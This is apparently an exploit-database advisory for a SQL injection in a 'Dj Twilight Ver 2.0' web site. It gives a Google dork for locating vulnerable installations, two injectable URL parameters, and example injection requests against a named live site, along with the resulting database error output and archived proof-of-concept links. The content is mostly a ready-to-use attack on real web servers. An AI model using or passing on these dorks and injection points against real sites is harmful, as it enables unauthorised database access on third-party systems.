#################################################################################################
# Exploit Title : Dj Twilight Ver 2.0 Copyright 1999 - 2018 PicturesGallery SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : djtwilight.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''DJ TWILIGHT.COM Ver 2.0 Copyright 1999 - 2018''
# Exploit :
/site/oldparty.asp?offset=[SQL Inj]
/public/gallery/cat.asp?iCat=[SQL Inj]
#################################################################################################
# Example Site =>
djtwilight.com/site/oldparty.asp?offset=20%27 => [ Proof of Concept ] => archive.is/bwfpU
djtwilight.com/public/gallery/cat.asp?iCat=55%27 => [ Proof of Concept ] => archive.is/WsmsY
# SQL Database Error =>
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'r'
/site/oldparty.asp, line 99
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = 55'''.
/public/gallery/inc_cat.asp, line 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################